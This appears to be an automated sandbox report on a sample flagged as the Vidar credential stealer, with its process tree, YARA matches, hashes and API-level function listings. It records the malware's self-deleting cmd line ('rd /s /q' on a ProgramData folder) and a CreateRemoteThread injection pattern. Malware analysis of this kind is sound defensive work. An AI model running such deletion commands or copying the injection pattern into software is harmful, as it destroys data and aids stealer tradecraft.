!o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Target ID:	0
Start time:	22:12:55
Start date:	29/04/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xa00000
File size:	368'128 bytes
MD5 hash:	B898CED2E152060F5770F1C6337006F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	22:12:55
Start date:	29/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x960000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:13:00
Start date:	29/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	22:13:00
Start date:	29/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://796299082092352771018332050787432950295397740/
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:13:00
Start date:	29/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	22:13:00
Start date:	29/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1960,i,9720651213267638284,544210953920903557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:13:09
Start date:	29/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	22:13:42
Start date:	29/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFBFCAFCBKFI" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	22:13:42
Start date:	29/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:13:42
Start date:	29/04/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0xe50000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2%
Total number of Nodes:	404
Total number of Limit Nodes:	18

Executed Functions

Function 00A184AC Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 863973fb843b44f4181189f3f862c2c6324593acd912259d5ad9aa43f6a36062
Instruction ID: a29922750c100dece1c30b290a6002b6a982f245c3577ddab2478806f608296b
Opcode Fuzzy Hash: 863973fb843b44f4181189f3f862c2c6324593acd912259d5ad9aa43f6a36062
Instruction Fuzzy Hash: 48E08C32911278EBCB14DB88CA04D8AF3ECEB44B10B1109AAB901D3100DA78DE40C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00A0F2BC Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8de157ae7f70aa572271f9e4d8239843e4e4338bba078dda5b3633f9ef309906
Instruction ID: 5953184eb18c548d0260e7892651a9ecc0be99a3b0af80d44765fc60c9d3436e
Opcode Fuzzy Hash: 8de157ae7f70aa572271f9e4d8239843e4e4338bba078dda5b3633f9ef309906
Instruction Fuzzy Hash: 50C08C3C002E088ACE398A1092B13E43354B7D5782F84049CC8030BA82CA1E9CC3D600

Uniqueness

Uniqueness Score: -1.00%

Function 00A11C8B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00A11D98,?,00000000,00000000,00000000,?,?,00A11FC2,00000021,FlsSetValue,00A223C8,00A223D0,00000000), ref: 00A11D4C

Strings

ext-ms-, xrefs: 00A11CF6
api-ms-, xrefs: 00A11CE2

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 1f24360dfe9e04aaa2cb12d06ec4810fa3719149b9fdedbf6dd2385e4f8f8e82
Instruction ID: bc3b668f7543cad604db6a0823a34361e4753f51e31d49b4e8377af5f9c56c0a
Opcode Fuzzy Hash: 1f24360dfe9e04aaa2cb12d06ec4810fa3719149b9fdedbf6dd2385e4f8f8e82
Instruction Fuzzy Hash: BB212771A01212EBC721DB68FD40AEA7768AF053A0F254231FE05A7291E730ED42C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 00A15C5B Relevance: 7.7, APIs: 5, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 00A15CE2
__alloca_probe_16.LIBCMT ref: 00A15DA3
__freea.LIBCMT ref: 00A15E0A

Part of subcall function 00A1223F: HeapAlloc.KERNEL32(00000000,00000000,?,?,00A07345,?,?,00000000,?,?,00A011C6,-00000004,00000000,00000000,00A014FC,00000000), ref: 00A12271

__freea.LIBCMT ref: 00A15E1F
__freea.LIBCMT ref: 00A15E2F

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 6e64b5994f218a4744bec10b97f9ceb846aa9fa58edca6eebe955991f58b304e
Instruction ID: 3523c93d887dfd502ccf3077b2a56a01e9fefa68fd3a8960b620aac2c76ad339
Opcode Fuzzy Hash: 6e64b5994f218a4744bec10b97f9ceb846aa9fa58edca6eebe955991f58b304e
Instruction Fuzzy Hash: E3519272E00616EFEB259F74DD85EFB3AA9EF84714B150129FD04D6190E635CDA08760

Uniqueness

Uniqueness Score: -1.00%

Function 00A020A7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
memorysynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A021B1: _strlen.LIBCMT ref: 00A021C9

VirtualProtect.KERNELBASE(00A5AC00,000004AC,00000040,?,?,006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@), ref: 00A020F1
CreateRemoteThread.KERNELBASE(000000FF,00000000,00000000,Function_00002057,00000000,00000000,00000000), ref: 00A02105
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00A0210E

Part of subcall function 00A0223E: _Deallocate.LIBCONCRT ref: 00A0224D

Strings

006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@, xrefs: 00A020B8

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: CreateDeallocateObjectProtectRemoteSingleThreadVirtualWait_strlen
String ID: 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@
API String ID: 1041046508-32248209
Opcode ID: dd91f512376d6dc4c0fa579f60e0dd8db70071d8418ad1ca83a2994ac3ed38d2
Instruction ID: 61d913f460626e39b9447b5c57282e2086deeaabc968f5968af4a2fe2965af35
Opcode Fuzzy Hash: dd91f512376d6dc4c0fa579f60e0dd8db70071d8418ad1ca83a2994ac3ed38d2
Instruction Fuzzy Hash: 7C01C471A002187FE714EBE4ED4AEFF73ACFB08314B514229F912A61C1EE3499058724

Uniqueness

Uniqueness Score: -1.00%

Function 00A0F248 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00A0F39E,?,00A0F242,00000000,?,?,00A0F39E,126C9991,?,00A0F39E), ref: 00A0F259
TerminateProcess.KERNEL32(00000000,?,00A0F242,00000000,?,?,00A0F39E,126C9991,?,00A0F39E), ref: 00A0F260
ExitProcess.KERNEL32 ref: 00A0F272

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ae2905a0de639a36a1ff534adb791eadc2add997ece92bd99bedefdaa6be69eb
Instruction ID: 69fb27d49ce8fe6e99f2c669ddec6309f82808d15624ef397de65687077a549c
Opcode Fuzzy Hash: ae2905a0de639a36a1ff534adb791eadc2add997ece92bd99bedefdaa6be69eb
Instruction Fuzzy Hash: 4BD09E35000648AFCF216FA0ED0D9C93F26AF48351B458030B9099A472DB319953DA50

Uniqueness

Uniqueness Score: -1.00%

Function 00A17DDD Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A1790D: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00A17938

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00A17C24,?,00000000,?,00000000,?), ref: 00A17E3E
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A17C24,?,00000000,?,00000000,?), ref: 00A17E80

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: d7a2b7e9ebc354b3eb94903a3465ec669725bf73b6a1339230ba1303aed85e0f
Instruction ID: aa27f22d3efce2573b55342a4ac69b1110d1fa688942f95dc12db07577dcc836
Opcode Fuzzy Hash: d7a2b7e9ebc354b3eb94903a3465ec669725bf73b6a1339230ba1303aed85e0f
Instruction Fuzzy Hash: 7E512271A082459EDB21CF75C881AFFBBF5EF45300F2454AED0968B292E77499C6CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A044BB Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_Fputc.LIBCPMT ref: 00A04594

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: Fputc
String ID:
API String ID: 3078413507-0
Opcode ID: 500dee25a77a715bccb0a5158638523dad51630f03b64dba3b46f6be19dbcc01
Instruction ID: e1c7863ebdb550b152ff366594af625b119a36b406036a4140eb8494c68d9f39
Opcode Fuzzy Hash: 500dee25a77a715bccb0a5158638523dad51630f03b64dba3b46f6be19dbcc01
Instruction Fuzzy Hash: 16418FB690021EABCF14DF64E9809EEB7B8FF0D351B544126EA01A7680EB31FD51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A12125 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,00A15D49,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00A12159
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00A15D49,?,?,00000000,?,00000000), ref: 00A12177

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 09f96278a6facc9c9e1982a8eac3cc880408aab74af41026bb0360212d4829f1
Instruction ID: 0a518594baef00598b00afb327d73dcd9e273c55859bfdff68e99c9bef015cf4
Opcode Fuzzy Hash: 09f96278a6facc9c9e1982a8eac3cc880408aab74af41026bb0360212d4829f1
Instruction Fuzzy Hash: B0F07A3200016ABBCF129F90DD05EDE3F66EF493A0F058210FB1865120C732C9B2EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A179E1 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32(E8458D00,?,00A17C30,00A17C24,00000000), ref: 00A17A13

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 01f5b23b9f909ce7f86bac617000a76900ce647f0c37ce0f57e50b76464efa03
Instruction ID: 1122c50afeedce514ef0604a2ec22f5a3d1c6108969369d2bc383c8262ef7b5c
Opcode Fuzzy Hash: 01f5b23b9f909ce7f86bac617000a76900ce647f0c37ce0f57e50b76464efa03
Instruction Fuzzy Hash: 1851497190C2589EDB218F28CD80EEE7BB8EB45704F2455E9E59AC7182D3349E86CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A11D56 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf392609c3ac7769b70eee7ecafba76ea172de0d9562576b7b25268b4ea62261
Instruction ID: 721fda6ef834f72de36a3b416583a97389fca42c98f1234d19a96d12d7d7f4d3
Opcode Fuzzy Hash: bf392609c3ac7769b70eee7ecafba76ea172de0d9562576b7b25268b4ea62261
Instruction Fuzzy Hash: 940192336042259F9F25DB6DFD40AEA33B6EB857607144524FA05DB198EA309882C790

Uniqueness

Uniqueness Score: -1.00%

Function 00A1228D Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00A11968,00000001,00000364,00000000,00000002,000000FF,?,?,00A07345,?,?,00000000), ref: 00A122CE

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 69f0e58fd59a66059858295ef65b9c92cf1452495109667edfc918a574f1bb3e
Instruction ID: b39a3efea58bd6eb024fe1959b1a8bb2f4874095d68c60a91125a4e3a01a094a
Opcode Fuzzy Hash: 69f0e58fd59a66059858295ef65b9c92cf1452495109667edfc918a574f1bb3e
Instruction Fuzzy Hash: 7FF0E9315042286BEB316B669E01FDE3758AF857A0F148021EC04A6590CB70DCF143E0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A1A674 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00A1A992,00000002,00000000,?,?,?,00A1A992,?,00000000), ref: 00A1A70D
GetLocaleInfoW.KERNEL32(?,20001004,00A1A992,00000002,00000000,?,?,?,00A1A992,?,00000000), ref: 00A1A736
GetACP.KERNEL32(?,?,00A1A992,?,00000000), ref: 00A1A74B

Strings

OCP, xrefs: 00A1A6C8
ACP, xrefs: 00A1A692

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: eb5b5b7fac089f0426b355a02702c6f56c53c0557f9225be1723ca970b37d430
Instruction ID: e700cad58dd098324997cefc0835b0a1de2109f154cd5d257480ba148ef63d0c
Opcode Fuzzy Hash: eb5b5b7fac089f0426b355a02702c6f56c53c0557f9225be1723ca970b37d430
Instruction Fuzzy Hash: 3121B032702100AADB34DF64DA44AD773B6AF74BA0B5A8464E91ADB151FB32DFC1C352

Uniqueness

Uniqueness Score: -1.00%

Function 00A1A849 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A117CA: GetLastError.KERNEL32(?,00000008,00A16C2A), ref: 00A117CE
Part of subcall function 00A117CA: SetLastError.KERNEL32(00000000,00A27B20,00000024,00A0E406), ref: 00A11870

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00A1A955
IsValidCodePage.KERNEL32(00000000), ref: 00A1A99E
IsValidLocale.KERNEL32(?,00000001), ref: 00A1A9AD
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00A1A9F5
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00A1AA14

Memory Dump Source

